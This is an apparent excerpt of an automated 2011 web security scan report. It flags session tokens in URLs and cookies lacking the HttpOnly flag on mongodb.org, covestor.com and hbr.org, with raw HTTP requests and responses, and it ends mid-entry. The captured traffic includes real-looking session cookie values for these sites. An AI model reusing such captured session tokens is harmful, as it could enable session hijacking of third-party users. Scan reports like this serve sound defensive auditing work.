HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:03:20 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1320843800585 Vary: User-Agent Content-Type: text/html;charset=UTF-8 Content-Length: 37810 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>Home - MongoDB</title> ...[SNIP]... <li> <a href="/spaces/flyingpdf/pdfpageexport.action?pageId=131081&atl_token=3srSe89IIe" class="" > <span>...[SNIP]...
5.2. http://www.mongodb.org/display/DOCS/Source+Code
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/display/DOCS/Source+Code
Issue detail
The response contains the following links that appear to contain session tokens:http://www.mongodb.org/spaces/flyingpdf/pdfpageexport.action?pageId=132298&atl_token=3srSe89IIe
Request
GET /display/DOCS/Source+Code HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/ Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.3.10.1320843794; __utmc=266042259; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708; JSESSIONID=BA89C686021CA5448E1370C96EB97C02
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:03:31 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1320843811914 Vary: User-Agent Content-Type: text/html;charset=UTF-8 Content-Length: 30118 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>Source Code - MongoDB</title> ...[SNIP]... <li> <a href="/spaces/flyingpdf/pdfpageexport.action?pageId=132298&atl_token=3srSe89IIe" class="" > <span>...[SNIP]...
6. Cookie without HttpOnly flag set
previous
next
There are 60 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive. You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
6.1. http://www.mongodb.org/try/js/connection.js
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/try/js/connection.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:rack.session=BAh7AA%3D%3D%0A; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /try/js/connection.js HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/ Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0
Response
HTTP/1.1 200 OK Server: thin 1.2.7 codename No Hup Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: application/javascript;charset=utf-8 Accept-Ranges: bytes X-xgen-cache: yes Connection: keep-aliveSet-Cookie: rack.session=BAh7AA%3D%3D%0A; path=/ Last-Modified: Tue, 05 Jul 2011 18:51:20 GMT X-Cache-Info: caching Content-Length: 3277 // TryMongo // // Copyright (c) 2009 Kyle Banker // Licensed under the MIT Licence. // http://www.opensource.org/licenses/mit-license.php var AppBaseURL = "/try/" var Connection = function() { thi...[SNIP]...
6.2. http://www.mongodb.org/try/js/constants.js
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/try/js/constants.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:rack.session=BAh7AA%3D%3D%0A; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /try/js/constants.js HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/ Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0
Response
HTTP/1.1 200 OK Server: thin 1.2.7 codename No Hup Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: application/javascript;charset=utf-8 Accept-Ranges: bytes X-xgen-cache: yes Connection: keep-aliveSet-Cookie: rack.session=BAh7AA%3D%3D%0A; path=/ Last-Modified: Fri, 03 Sep 2010 15:31:36 GMT X-Cache-Info: caching Content-Length: 1600 // TryMongo // // Copyright (c) 2009 Kyle Banker // Licensed under the MIT Licence. // http://www.opensource.org/licenses/mit-license.php var DefaultInputHtml = function(stack) { var lineP...[SNIP]...
6.3. http://www.mongodb.org/try/js/lib/collection.js
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/try/js/lib/collection.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:rack.session=BAh7AA%3D%3D%0A; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /try/js/lib/collection.js HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/ Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0
Response
HTTP/1.1 200 OK Server: thin 1.2.7 codename No Hup Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: application/javascript;charset=utf-8 Accept-Ranges: bytes X-xgen-cache: yes Connection: keep-aliveSet-Cookie: rack.session=BAh7AA%3D%3D%0A; path=/ Last-Modified: Mon, 12 Apr 2010 17:53:55 GMT X-Cache-Info: caching Content-Length: 16027 // collection.js if ( ( typeof DBCollection ) == "undefined" ){ DBCollection = function( mongo , db , shortName , fullName ){ this._mongo = mongo; this._db = db; this._s...[SNIP]...
6.4. http://www.mongodb.org/try/js/lib/query.js
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/try/js/lib/query.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:rack.session=BAh7AA%3D%3D%0A; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /try/js/lib/query.js HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/ Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0
Response
HTTP/1.1 404 Not Found Server: thin 1.2.7 codename No Hup Vary: Accept-Encoding X-Cascade: pass Cache-Control: max-age=3600 Content-Type: text/html;charset=utf-8 X-xgen-cache: yes Connection: keep-aliveSet-Cookie: rack.session=BAh7AA%3D%3D%0A; path=/ X-Cache-Info: caching Content-Length: 18 <h1>Not Found</h1>
6.5. http://www.mongodb.org/try/js/mongo.js
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/try/js/mongo.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:rack.session=BAh7AA%3D%3D%0A; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /try/js/mongo.js HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/ Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0
Response
HTTP/1.1 200 OK Server: thin 1.2.7 codename No Hup Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: application/javascript;charset=utf-8 Accept-Ranges: bytes X-xgen-cache: yes Connection: keep-aliveSet-Cookie: rack.session=BAh7AA%3D%3D%0A; path=/ Last-Modified: Tue, 09 Aug 2011 18:54:39 GMT X-Cache-Info: caching Content-Length: 17031 // TryMongo // // Copyright (c) 2009 Kyle Banker // Licensed under the MIT Licence. // http://www.opensource.org/licenses/mit-license.php // Readline class to handle line input. var ReadLine = functi...[SNIP]...
6.6. http://www.mongodb.org/try/js/object_id.js
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/try/js/object_id.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:rack.session=BAh7AA%3D%3D%0A; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /try/js/object_id.js HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/ Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0
Response
HTTP/1.1 200 OK Server: thin 1.2.7 codename No Hup Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: application/javascript;charset=utf-8 X-xgen-cache: yes Connection: keep-aliveSet-Cookie: rack.session=BAh7AA%3D%3D%0A; path=/ Last-Modified: Mon, 12 Apr 2010 17:53:55 GMT X-Cache-Info: caching Content-Length: 244 var ObjectIdCounter = 0; var ObjectId = function() { this.counter = (ObjectIdCounter += 1); this.str = this.counter; this.initialize(); return this.counter; }; ObjectId.prototype.initial...[SNIP]...
6.7. http://www.mongodb.org/try/js/shell_utils.js
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/try/js/shell_utils.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:rack.session=BAh7AA%3D%3D%0A; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /try/js/shell_utils.js HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/ Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0
Response
HTTP/1.1 200 OK Server: thin 1.2.7 codename No Hup Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: application/javascript;charset=utf-8 Accept-Ranges: bytes X-xgen-cache: yes Connection: keep-aliveSet-Cookie: rack.session=BAh7AA%3D%3D%0A; path=/ Last-Modified: Mon, 12 Apr 2010 17:53:55 GMT X-Cache-Info: caching Content-Length: 15602 DB = function() { } print = function(msg) { //console.log(msg); } friendlyEqual = function( a , b ){ if ( a == b ) return true; if ( tojson( a ) == tojson( b ) ) return t...[SNIP]...
6.8. http://www.mongodb.org/try/js/tokens.js
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/try/js/tokens.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:rack.session=BAh7AA%3D%3D%0A; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /try/js/tokens.js HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/ Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0
Response
HTTP/1.1 200 OK Server: thin 1.2.7 codename No Hup Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: application/javascript;charset=utf-8 Accept-Ranges: bytes X-xgen-cache: yes Connection: keep-aliveSet-Cookie: rack.session=BAh7AA%3D%3D%0A; path=/ Last-Modified: Mon, 12 Apr 2010 17:53:55 GMT X-Cache-Info: caching Content-Length: 7224 // tokens.js // 2009-05-17 // (c) 2006 Douglas Crockford // Produce an array of simple token objects from a string. // A simple token object contains these members: // type: 'name', 'string', '...[SNIP]...
6.9. http://www.mongodb.org/try/js/utils.js
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/try/js/utils.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:rack.session=BAh7AA%3D%3D%0A; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /try/js/utils.js HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/ Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0
Response
HTTP/1.1 200 OK Server: thin 1.2.7 codename No Hup Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: application/javascript;charset=utf-8 Accept-Ranges: bytes X-xgen-cache: yes Connection: keep-aliveSet-Cookie: rack.session=BAh7AA%3D%3D%0A; path=/ Last-Modified: Fri, 03 Sep 2010 15:31:36 GMT X-Cache-Info: caching Content-Length: 1490 // Try Mongo // // Copyright (c) 2009 Kyle Banker // Licensed under the MIT licence. // http://www.opensource.org/licenses/mit-license.php Array.prototype.include = function(value) { for(var i=0; i...[SNIP]...
6.10. https://account.covestor.com/mirroring-account/join-trial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://account.covestor.com
Path:
/mirroring-account/join-trial
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:C1320846063712=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:46:02 GMT;path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mirroring-account/join-trial HTTP/1.1 Host: account.covestor.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://covestor.com/ Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:41:03 GMT Server: COVESTOR Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:41:03 GMT;path=/Set-Cookie: C1320846063712=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:46:02 GMT;path=/ Expires: Wed, 09 Nov 2011 13:41:03 GMT Vary: Accept-Encoding Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 24468 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- start head:me...[SNIP]...
6.11. https://account.covestor.com/mirroring-account/join-trial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://account.covestor.com
Path:
/mirroring-account/join-trial
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:C1320846290554=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:49:49 GMT;path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /mirroring-account/join-trial HTTP/1.1 Host: account.covestor.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://account.covestor.com/mirroring-account/join-trial Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; C1320846063250=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial Content-Type: application/x-www-form-urlencoded Content-Length: 89 email=&emailconfirm=&password=&fname=&lname=&phone=&terms=1&action=1&=Activate+Free+Trial
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:44:50 GMT Server: COVESTOR Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:44:50 GMT;path=/Set-Cookie: C1320846290554=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:49:49 GMT;path=/ Expires: Wed, 09 Nov 2011 13:44:50 GMT Vary: Accept-Encoding Keep-Alive: timeout=15, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 24770 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- start head:me...[SNIP]...
6.12. http://hbr.org/a4j_3_2_0-SNAPSHOTorg/richfaces/renderkit/html/css/basic_classes.xcss/DATB/eAFjizhSBAADHgGV
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/a4j_3_2_0-SNAPSHOTorg/richfaces/renderkit/html/css/basic_classes.xcss/DATB/eAFjizhSBAADHgGV
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /a4j_3_2_0-SNAPSHOTorg/richfaces/renderkit/html/css/basic_classes.xcss/DATB/eAFjizhSBAADHgGV HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:18 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 X-Powered-By: JSF/1.2 Last-Modified: Tue, 08 Nov 2011 13:08:44 GMT Cache-control: max-age=86400 Expires: Thu, 10 Nov 2011 14:09:18 GMT Content-Type: text/css;charset=ISO-8859-1 LEG: 5 Vary: Accept-Encoding Content-Length: 6685 .rich-container input,.rich-input,.rich-container select,.rich-select,.rich-container textarea,.rich-textarea,.rich-container button,.rich-button,.rich-container keygen,.rich-keygen,.rich-container is...[SNIP]...
6.13. http://hbr.org/a4j_3_2_0-SNAPSHOTorg/richfaces/renderkit/html/css/extended_classes.xcss/DATB/eAFjizhSBAADHgGV
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/a4j_3_2_0-SNAPSHOTorg/richfaces/renderkit/html/css/extended_classes.xcss/DATB/eAFjizhSBAADHgGV
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /a4j_3_2_0-SNAPSHOTorg/richfaces/renderkit/html/css/extended_classes.xcss/DATB/eAFjizhSBAADHgGV HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:18 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 X-Powered-By: JSF/1.2 Last-Modified: Tue, 08 Nov 2011 13:08:44 GMT Cache-control: max-age=86400 Expires: Thu, 10 Nov 2011 14:09:18 GMT Content-Type: text/css;charset=ISO-8859-1 LEG: 5 Vary: Accept-Encoding Content-Length: 2873 .rich-container input,.rich-input,.rich-container select,.rich-select,.rich-container textarea,.rich-textarea,.rich-container button,.rich-button,.rich-container keygen,.rich-keygen,.rich-container is...[SNIP]...
6.14. http://hbr.org/hbrg-main/resources/css/jquery-ui-1.8.10.custom.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/css/jquery-ui-1.8.10.custom.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/css/jquery-ui-1.8.10.custom.css HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:18 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:18:03 GMT ETag: "61182-8490-4a88871aca0c0" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:18 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 33936 Content-Type: text/css /* * jQuery UI CSS Framework 1.8.10 * * Copyright 2011, AUTHORS.txt (http://jqueryui.com/about) * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * http://d...[SNIP]...
6.15. http://hbr.org/hbrg-main/resources/css/marketing/baynote.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/css/marketing/baynote.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/css/marketing/baynote.css HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/hbrg-main/resources/css/style.css Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:24 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:18:03 GMT ETag: "3eb37a-fe5-4a88871aca0c0" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:24 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 4069 Content-Type: text/css /* Begin Baynote */ /* Begin Baynote Global */ .bn_g_welcome { color:#231f20; font-size:12px; font-weight:bold; letter-spacing:0.05em; margin-bottom:10px; text-transform:uppercase; } .bn_g_resu...[SNIP]...
6.16. http://hbr.org/hbrg-main/resources/css/marketing/jquery.fancybox-1.3.1.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/css/marketing/jquery.fancybox-1.3.1.css
Issue detail
